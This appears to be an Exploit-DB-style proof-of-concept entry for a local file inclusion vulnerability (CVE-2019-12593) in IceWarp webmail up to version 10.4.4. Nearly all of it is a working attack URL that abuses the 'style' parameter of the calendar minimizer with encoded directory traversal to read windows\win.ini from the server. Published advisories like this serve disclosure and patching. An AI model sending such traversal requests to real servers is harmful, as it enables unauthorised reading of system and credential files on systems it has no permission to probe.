Share
# Exploit Title: IceWarp <=10.4.4 local file include  
# Date: 02/06/2019  
# Exploit Author: JameelNabbo  
# Website: uitsec.com  
# Vendor Homepage: http://www.icewarp.com  
# Software Link: https://www.icewarp.com/downloads/trial/  
# Version: 10.4.4  
# Tested on: Windows 10  
# CVE: CVE-2019-12593  
POC:  
  
http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]  
  
Example:  
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini